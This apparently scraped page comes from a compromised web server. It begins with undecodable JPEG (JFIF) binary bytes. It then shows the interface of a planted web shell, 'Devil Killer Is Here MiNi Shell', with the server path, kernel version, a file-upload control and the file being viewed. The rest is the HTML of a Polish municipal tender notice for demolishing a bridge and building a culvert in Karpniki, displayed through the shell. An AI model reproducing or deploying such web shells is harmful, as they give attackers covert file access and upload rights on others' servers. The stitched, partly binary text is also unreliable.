JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210518/0005744101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00057441 z dnia 2021-05-18</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbiórka istniejącego obiektu mostowego oraz budowa przepustu wraz z dojazdami na Potoku Karpnickim w ciągu ulicy Leśnej w Karpnikach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mysłakowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821701</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szkolna 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mysłakowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-533</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">756439960</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">756439999</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@myslakowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://myslakowice.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbiórka istniejącego obiektu mostowego oraz budowa przepustu wraz z dojazdami na Potoku Karpnickim w ciągu ulicy Leśnej w Karpnikach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-75eb19e2-b7b4-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00057441</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wniniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciumini Portalu https://miniportal.uzp.gov.pl/, ePUAPU https://epuap.gov.pl/wps/portal oraz pocztyelektronicznej - pzp@myslakowice.pl (przy czym ten sposób komunikacji nie jest właściwy dla ofertyoraz dokumentów składanych wraz z ofertą). Uczestnicy postępowania składając ofertę akceptująpostanowienia: a) Regulaminu korzystania z systemu miniPortal – dostępnego pod adresem:https://miniportal.uzp.gov.pl/WarunkiUslugib) Instrukcji użytkownika systemu miniPortal-ePUAP –dostępnej pod adresem: https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf2.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie niniejszego zamówieniapublicznego musi posiadać konto na e-PUAP. Wykonawca posiadający konto na ePUAP ma dostęp doformularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji. 3. Wymaganiatechniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopiidokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały wRegulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.4. Maksymalny rozmiar plikówprzesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, wymiany, wycofania oferty lubwniosku oraz do komunikacji wynosi 150 MB. 5. Za datę przekazania oferty, zawiadomień,dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń orazinnych informacji przyjmuje się datę ich przekazania na ePUAP.6. We wszelkiej korespondencjizwiązanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się nr ogłoszenia (BZP,TED lub ID postępowania).7. Skrytka e-PUAP Zamawiającego: /Myslakowice/SkrytkaESP9. Adresstrony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumentyzamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia:https://myslakowice.bip.net.pl/</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">nie dotyczy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L z 2016 r. Nr119, str. 1 z późn.zm.), dalej „RODO”, informuję, że: • administratorem Pani/Pana danych osobowychjest Gmina Mysłakowice, 58-533 Mysłakowice ul. Szkolna 5• inspektorem ochrony danych osobowychw Gminie Mysłakowice jest RODOSTAR Dawid Kaszuba, ul. Przepiórek 10, 41-215 Sosnowiec •Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanymz postępowaniem o udzielenie zamówienia publicznego pn. Rozbiórka istniejącego obiektu mostowego oraz budowa przepustu wraz z dojazdami na Potoku Karpnickim w ciągu ulicy Leśnej w Karpnikach, Znak sprawy: RGK.ZP.271.05.2021 prowadzonym w trybie podstawowym bez negocjacji,•odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostaniedokumentacja postępowania w oparciu o art. 18 ustawy z dnia 11 września 2019 r. – Prawo zamówieńpublicznych (tj. Dz. U. z 2019 r. poz. 2019 z póź. zm.), dalej „ustawa Pzp”; • Pani/Pana dane osobowebędą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończeniapostępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okresprzechowywania obejmuje cały czas trwania umowy;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGK.ZP.05.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest rozbiórka istniejącego obiektu mostowego oraz budowa przepustu wraz z dojazdami na Potoku Karpnickim w ciągu ulicy Leśnej w Karpnikach. Inwestycja zlokalizowana jest na działce nr 273 - obręb 0005 Karpniki. Zakres przedmiotu zamówienia obejmuje rozbiórkę istniejącego obiektu mostowego oraz budowę przepustu na Potoku Karpnickim w ciągu ulicy Leśnej w Karpnikach. W zakresie robót znajdują się także roboty drogowe polegające na odtworzeniu odcinków dojazdowych. Dojazdy należy odtworzyć poprzez wymianę całkowitą konstrukcji z uwagi na konieczność korekty spadków podłużnych i poprzecznych w obrębie obiektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zakres powyższych zamówień będzie polegał na powtórzeniu podobnych dostaw, usługlub robót budowlanych , jak w zamówieniu podstawowym do 15% wartości zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierowałnastępującymi kryteriami i wagami: kryterium obowiązujące: cena waga: 60% kryterium przedmiotowe:okres gwarancji i rękojmi waga: 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki udziału w postępowaniu:O udzielenie niniejszego zamówienia mogą ubiegać sięWykonawcy, którzy:1) nie podlegają wykluczeniu z postępowania;2) spełniają warunki udziału wpostępowaniu dotyczące:a) zdolności do występowania w obrocie gospodarczym: Zamawiającynie stawia warunku w powyższym zakresie. b) uprawnień do prowadzenia określonejdziałalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiającynie stawia warunku w powyższym zakresie. c) sytuacji ekonomicznej lub finansowej:Powyższywarunek zostanie spełniony, gdy Wykonawca wykaże, że posiada ubezpieczenie ododpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotemzamówienia na sumę gwarancyjną nie mniejszą niż 150 000,00 zł (słownie: stopięćdziesiąt tysięcy złotych). d) zdolności technicznej lub zawodowej: Powyższy warunek zostaniespełniony, gdy Wykonawca wykaże, że dysponuje lub będzie dysponował:a. co najmniej jednąosobą, która będzie pełnić funkcję kierownika robót budowlanych przy realizacji przedmiotowegozamówienia, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalnościkonstrukcyjno-budowlanej bez ograniczeń albo w specjalności drogowej w co najmniejograniczonym zakresie lub odpowiadającymi im uprawnieniami budowlanymi wydanymi napodstawie wcześniej obowiązujących przepisów bądź uznane na zasadach określonych wustawie o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskichUnii Europejskiej (Dz.U. z 2020 r., poz. 220 z późn.zm.), posiadający aktualne zaświadczenie oprzynależności do właściwej Izby Samorządu Zawodowego,b. minimum czteremapracownikami fizycznymi, którzy będą wykonywać czynności bezpośrednio związane z realizacjązamówienia przez cały okres jego trwania, zatrudnionych na umowę o pracę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziałuw postępowaniu:a) odpis zwłaściwego rejestru lub z centralnej ewidencji i informacji o działalnościgospodarczej, jeżeli odrębneprzepisy wymagają wpisu do rejestru lub ewidencji, w zakresie art. 109ust. 1 pkt.4 ustawy.JeżeliWykonawca ma siedzibę lub miejsce zamieszkania poza terytoriumRzeczypospolitej Polskiej, zamiastww. odpisu, składa dokument lub dokumenty wystawione w kraju, wktórym Wykonawca ma siedzibęlub miejsce zamieszkania, potwierdzające, że nie otwarto jegolikwidacji ani nie ogłoszono upadłości.Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejscezamieszkania lub miejsce zamieszkaniama osoba, której dokument dotyczy, nie wydaje siędokumentów, o których mowa powyżej, zastępujesię je dokumentem zawierającym odpowiedniooświadczenie Wykonawcy, ze wskazaniem osoby alboosób uprawnionych do jego reprezentacji, luboświadczenie osoby, której dokument miał dotyczyć,złożone przed notariuszem lub przed organemsądowym, administracyjnym albo organem samorząduzawodowego lub gospodarczego właściwym zewzględu na siedzibę lub miejsce zamieszkaniaWykonawcy lub miejsce zamieszkania tej osoby.Dokumenty/oświadczenia powinny być wystawionenie wcześniej niż 6 miesięcy przed upływem terminuskładania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału wpostępowaniu:a) sytuacjiekonomicznej lub finansowej:dokument potwierdzający, że Wykonawca jestubezpieczony ododpowiedzialności cywilnej w zakresie prowadzonej działalności związanej zprzedmiotem zamówieniana sumę gwarancyjną określoną w dziale XII pkt. 1 ppkt. 2 lit. c. Zgodnie zart. 26 ust. 2c ustawy Pzp,jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentu, októrym mowa powyżej,może złożyć inny dokument, który w wystarczający sposób potwierdzi spełnianie warunku udziału wpostępowaniu;b) zdolności technicznej lub zawodowej:wykaz osób, którebędą uczestniczyć wwykonywaniu zamówienia, odpowiedzialnych za kierowanie robotamibudowlanymi (dziale XII pkt. 1ppkt. 2 lit. d), wraz z informacjami na temat ich kwalifikacji zawodowych,doświadczenia i wykształcenianiezbędnych do wykonania zamówienia, a także zakresuwykonywanych przez nich czynności, orazinformacją o podstawie do dysponowania tymi osobami;(Załącznik nr 3 do SWZ);</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a) sytuacja ekonomiczna lub finansowa:Powyższy warunek zostanie spełniony, gdyWykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresieprowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną niemniejszą niż 150 000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych). b) zdolność technicznalub zawodowa:Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże, że dysponujelub będzie dysponował:a. co najmniej jedną osobą, która będzie pełnić funkcję kierownikarobót budowlanych przy realizacji przedmiotowego zamówienia, posiadającą uprawnieniado kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeńlub odpowiadającymi im uprawnieniami budowlanymi wydanymi na podstawiewcześniej obowiązujących przepisów bądź uznane na zasadach określonych w ustawie ozasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich UniiEuropejskiej(Dz.U. z 2020 r., poz. 220 z późn.zm.), posiadający aktualne zaświadczenie oprzynależności do właściwej Izby Samorządu Zawodowego,b. minimum czterema pracownikamifizycznymi, którzy będą wykonywać czynności bezpośrednio związane z realizacją zamówieniaprzez cały okres jego trwania, zatrudnionych na umowę o pracę. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a) sytuacja ekonomiczna lub finansowa:Powyższy warunek zostanie spełniony, gdyWykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresieprowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną niemniejszą niż 150 000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych). b) zdolność technicznalub zawodowa:Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże, że dysponujelub będzie dysponował:a. co najmniej jedną osobą, która będzie pełnić funkcję kierownikarobót budowlanych przy realizacji przedmiotowego zamówienia, posiadającą uprawnieniado kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeńlub odpowiadającymi im uprawnieniami budowlanymi wydanymi na podstawiewcześniej obowiązujących przepisów bądź uznane na zasadach określonych w ustawie ozasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich UniiEuropejskiej(Dz.U. z 2020 r., poz. 220 z późn.zm.), posiadający aktualne zaświadczenie oprzynależności do właściwej Izby Samorządu Zawodowego,b. minimum czterema pracownikamifizycznymi, którzy będą wykonywać czynności bezpośrednio związane z realizacją zamówieniaprzez cały okres jego trwania, zatrudnionych na umowę o pracę. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Warunkiem udziału w postępowaniu jest wniesienie wadium w kwocie 2 000,00. zł (słownie: dwa tysiące złotych 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o zamówienie (konsorcjum), każdy ztychwykonawców (członków konsorcjum) odrębnie składa oświadczenie, o którym mowa w ust.1 pkt1 Działu XIV SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający, na mocy art. 455 ustawy prawo zamówień publicznych, przewidujemożliwość dokonania następujących zmian postanowień zawartej umowy w stosunku do treścioferty Wykonawcy dotyczących:1) przedłużenia terminu realizacji przedmiotu zamówienia wzakresie niezbędnym, tzn. jedynie o okres niezbędny do ustania przeszkód w wykonaniuprzedmiotu umowy, przy czym zmiana spowodowana może być jedynie okolicznościamileżącymi wyłącznie po stronie Zamawiającego lub okolicznościami niezależnymi zarówno odZamawiającego jak i od Wykonawcy, w szczególności: opóźnieniem w pozyskiwaniu decyzjiadministracyjnych, oczekiwaniem Wykonawcy na uzgodnienia właścicieli urządzeń obcych,zmianami dokumentacji wynikającymi z bieżących uzgodnień z jednostkami decyzyjnymi,koniecznością przesunięcia terminu przekazania terenu budowy, okolicznościami zaistniałymi wtrakcie realizacji przedmiotu umowy, tj. warunkami atmosferycznymi, 